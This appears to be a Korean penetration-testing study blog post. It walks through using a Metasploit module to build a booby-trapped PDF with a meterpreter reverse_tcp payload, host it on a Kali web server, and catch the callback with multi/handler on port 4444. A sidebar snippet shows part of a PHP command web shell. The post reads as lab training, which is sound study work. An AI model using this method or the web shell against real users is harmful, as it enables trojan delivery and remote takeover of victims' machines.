정상적인 pdf 코드에 공격코드를 심는 방법이다. 파일에 붙어다니는 바이러스의 한 형태이다.
exploit/windows/fileformat/adobe_pdf_embedded.exe 모듈을 사용한다.
payload 는 windows/meterpreter/reverse_tcp 를 사용한다.
evil.pdf 파일이 생성되었다. 이 파일을 웹 서비스 폴더로 옮겨준다.
웹 서비스를 실행하고 download 폴더로 evil.pdf 파일을 옮겨준다.
java 공격에서는 metasploit 모듈에서 핸들러를 생성해 주었는데 이 모듈의 경우에는 pdf 파일만 생성하고 모듈이 종료된다. 사용자가 나중에 pdf 파일을 실행하게 되면 4444 포트로 요청을 하게 되는데 이것을 받아주는 핸들러를 직접 생성해주어야 한다.
이럴때 use multi/handler 라는 모듈로 멀티 핸들러를 실행한다. 이는 클라이언트 사이드 공격시에 자주 사용되기 때문에 잘 알아두면 좋다.
기본 옵션은 없고 payload를 아까 pdf를 만들때 사용했던 페이로드(windows/meterpreter/reverse_tcp) 를 사용하고 lhost를 칼리로 맞춰주고 실행한다.
그 후 windows 에서 [kali ip]/download 를 접속해서 evil.pdf 를 다운받고 실행하면 다음과 같이 meterpreter가 실행된다.
Popular Posts
-
/* PHP Version URL CMD WebShell */ /* 사용법 : hxxp://URL/cmd.php?cmd=명령어 */ <? echo " <FORM ACTIO...
-
1. XSS 취약점 이란 대부분의 웹 해킹 기법은 웹 서버 설정 혹은 프로그램의 취약점을 공격하지만, XSS는 사용자를 공격하는 기법이다. 예를 들어 악성 코드가 포함된 글을 읽는 순간 악성 프로그램이 설치되거나 쿠키 혹은 세션 정보가 공격자에게 ...
Recent Posts
Blog Archive
-
▼
2018
(
66
)
-
▼
8월
(
14
)
- [mutillidae] mutillidae 계정 생성 및 로그인
- [metasploitable] nmap 이후 발견된 서비스에 대한 공격 테스트
- [메모] CSS 강의 좋은 곳
- [PentestrLAB] from sql to shell 취약점 점검
- metasploitable 설치
- [Self Question] Linux 에서 윈도우로 ssh 접속
- [kali linux] ftp 설정 및 메모 정보
- 칼리리눅스를 이용한 사회공학 공격
- ARP 패킷 분석
- 트로이 목마 제작 (backdoor)
- pdf 에 공격코드 삽입
- [metasploitable] java 공격
- [metasploitable] webdav 취약점
- [metasploitable] php cgi 취약점 공격
-
▼
8월
(
14
)
Powered by Blogger.